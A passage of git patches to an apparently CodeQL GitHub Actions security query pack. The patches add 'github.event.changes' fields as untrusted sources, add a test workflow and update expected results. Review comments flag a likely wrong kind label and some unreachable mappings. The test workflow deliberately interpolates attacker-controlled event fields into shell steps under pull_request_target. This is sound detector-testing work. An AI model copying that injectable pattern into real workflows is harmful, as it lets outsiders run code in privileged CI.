.github/workflows/untrusted_checkout3.yml | +| .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | +| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | From e147a0bc710d449b0f05be16a2081beaca4744e9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 25 Sep 2024 15:26:31 +0200 Subject: [PATCH 0539/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index a8a194c52ba..ecde4c83b20 100644 
--- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.53 +version: 0.1.54 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e4cb8969649..cddb4f61bf6 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.53 +version: 0.1.54 groups: [actions, queries] suites: codeql-suites extractor: javascript From 16f1a53584a63b8c101a25b91fe5ac1eb09a0ec0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 25 Sep 2024 18:21:54 +0200 Subject: [PATCH 0540/1267] Add new sources for github.event.changes --- ql/lib/ext/config/context_event_map.yml | 14 ++++++++++++++ .../ext/config/untrusted_event_properties.yml | 4 ++++ .../CWE-094/.github/workflows/test13.yml | 14 ++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 19 +++++++++++++++++++ .../CWE-094/CodeInjectionMedium.expected | 14 ++++++++++++++ 5 files changed, 65 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml diff --git a/ql/lib/ext/config/context_event_map.yml b/ql/lib/ext/config/context_event_map.yml index e09dab14f2b..4c2451b5ab8 100644 --- a/ql/lib/ext/config/context_event_map.yml +++ b/ql/lib/ext/config/context_event_map.yml 
@@ -4,34 +4,47 @@ extensions: extensible: contextTriggerDataModel data: - ["commit_comment", "github.event.comment"] + - ["commit_comment", "github.event.changes"] - ["discussion", "github.event.discussion"] + - ["discussion", "github.event.changes"] - ["discussion_comment", "github.event.comment"] - ["discussion_comment", "github.event.discussion"] + - ["discussion_comment", "github.event.changes"] - ["issues", "github.event.issue"] + - ["issues", "github.event.changes"] - ["issue_comment", "github.event.issue"] - ["issue_comment", "github.event.comment"] + - ["issue_comment", "github.event.changes"] - ["gollum", "github.event.pages"] + - ["gollum", "github.event.changes"] - ["merge_group", "github.event.merge_group"] - ["pull_request", "github.event.pull_request"] - ["pull_request", "github.head_ref"] + - ["pull_request", "github.event.changes"] - ["pull_request_comment", "github.event.comment"] - ["pull_request_comment", "github.event.pull_request"] - ["pull_request_comment", "github.head_ref"] + - ["pull_request_comment", "github.event.changes"] - ["pull_request_review", "github.event.pull_request"] - ["pull_request_review", "github.event.review"] - ["pull_request_review", "github.head_ref"] + - ["pull_request_review", "github.event.changes"] - ["pull_request_review_comment", "github.event.comment"] - ["pull_request_review_comment", "github.event.pull_request"] - ["pull_request_review_comment", "github.event.review"] - ["pull_request_review_comment", "github.head_ref"] + - ["pull_request_review_comment", "github.event.changes"] - ["pull_request_target", "github.event.pull_request"] - ["pull_request_target", "github.head_ref"] + - ["pull_request_target", "github.event.changes"] - ["push", "github.event.commits"] - ["push", "github.event.head_commit"] + - ["push", "github.event.changes"] - ["repository_dispatch", "github.event.client_payload"] - ["workflow_dispatch", "github.event.inputs"] - ["workflow_run", "github.event.workflow"] - ["workflow_run", 
"github.event.workflow_run"] + - ["workflow_run", "github.event.changes"] # workflow_call receives the same event payload as the calling workflow - ["workflow_call", "github.event.client_payload"] - ["workflow_call", "github.event.comment"] @@ -46,4 +59,5 @@ extensions: - ["workflow_call", "github.event.review"] - ["workflow_call", "github.event.workflow"] - ["workflow_call", "github.event.workflow_run"] + - ["workflow_call", "github.event.changes"] diff --git a/ql/lib/ext/config/untrusted_event_properties.yml b/ql/lib/ext/config/untrusted_event_properties.yml index 739544455da..be2e1c9c798 100644 --- a/ql/lib/ext/config/untrusted_event_properties.yml +++ b/ql/lib/ext/config/untrusted_event_properties.yml @@ -10,6 +10,7 @@ extensions: - ["github\\.event\\.pages\\[[0-9]+\\]\\.page_name", "title"] - ["github\\.event\\.pages\\[[0-9]+\\]\\.title", "title"] - ["github\\.event\\.workflow_run\\.display_title", "title"] + - ["github\\.event\\.changes\\.title\\.from", "title"] # URL - ["github\\.event\\.pull_request\\.head\\.repo\\.homepage", "url"] # TEXT @@ -25,12 +26,14 @@ extensions: - ["github\\.event\\.workflow_run\\.head_repository\\.description", "text"] - ["github\\.event\\.client_payload\\[[0-9]+\\]", "text"] - ["github\\.event\\.client_payload", "text"] + - ["github\\.event\\.changes\\.body\\.from", "title"] # BRANCH - ["github\\.event\\.pull_request\\.head\\.repo\\.default_branch", "branch"] - ["github\\.event\\.pull_request\\.head\\.ref", "branch"] - ["github\\.event\\.workflow_run\\.head_branch", "branch"] - ["github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", "branch"] - ["github\\.event\\.merge_group\\.head_ref", "branch"] + - ["github\\.event\\.changes\\.head\\.ref\\.from", "branch"] # LABEL - ["github\\.event\\.pull_request\\.head\\.label", "label"] # EMAIL 
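Review bot: `github.event.changes` is mapped to nearly every trigger in this hunk of context_event_map.yml, including `push`, `gollum`, `commit_comment` and `workflow_run`, but as far as I know the `changes` object is only delivered with `edited`-type activity (issues, comments, pull requests, discussions). For the other triggers the expression would presumably be empty, so those rows can only add findings that are not reachable; each row is worth checking against the webhook payload documentation, dropping the ones without an `edited` action. The new test13.yml exercises `pull_request_target` only, so none of the other rows are covered by a test. The `workflow_call` row in the following hunk (`@@ -46,4 +59,5 @@`) is consistent with the existing comment that this trigger receives the caller's payload.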
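Review bot: In the `# TEXT` block of untrusted_event_properties.yml the new row `- ["github\\.event\\.changes\\.body\\.from", "title"]` carries the kind `"title"`, while every other entry in that block uses `"text"`. It looks like a copy of the `changes.title.from` row added in the previous hunk and should read `- ["github\\.event\\.changes\\.body\\.from", "text"]`, otherwise anything keyed on the kind treats the previous body as a title. For the `# BRANCH` row, the only ref I know of under `changes` in the pull-request `edited` payload is `changes.base.ref.from`, so it is worth confirming that `changes.head.ref.from` exists before relying on it as a source.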
@@ -79,5 +82,6 @@ extensions: - ["github\\.event\\.workflow_run\\.head_commit\\.committer", "json"] - ["github\\.event\\.workflow_run\\.head_repository", "json"] - ["github\\.event\\.workflow_run\\.pull_requests", "json"] + - ["github\\.event\\.changes", "json"] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml new file mode 100644 index 00000000000..1e5c7eec177 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml @@ -0,0 +1,14 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo "${{ github.event.changes.body.from }}" + - run: echo "${{ github.event.changes.title.from }}" + - run: echo "${{ github.event.changes.head.ref.from }}" + - run: echo "${{ toJson(github.event.changes) }}" + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 749d0524415..207fb3abf01 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -15,6 +15,7 @@ edges | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | 
@@ -89,8 +90,10 @@ edges | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | provenance | | | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | provenance | | 
@@ -170,7 +173,9 @@ nodes | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | 
@@ -329,11 +334,15 @@ nodes | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | 
@@ -403,6 +412,10 @@ nodes | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | semmle.label | github.event.pull_request.title \|\| "foo" | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | semmle.label | github.event.changes.body.from | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | semmle.label | github.event.changes.head.ref.from | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | semmle.label | toJson(github.event.changes) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -444,6 +457,7 @@ subpaths | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. 
| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | 
@@ -509,6 +523,7 @@ subpaths | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | 
@@ -537,6 +552,10 @@ subpaths | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | ${{ needs.get-artifacts.outputs.ref }} | | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 3ad4e6915d2..e5ad4688852 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -15,6 +15,7 @@ edges | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | 
@@ -89,8 +90,10 @@ edges | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | provenance | | | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | 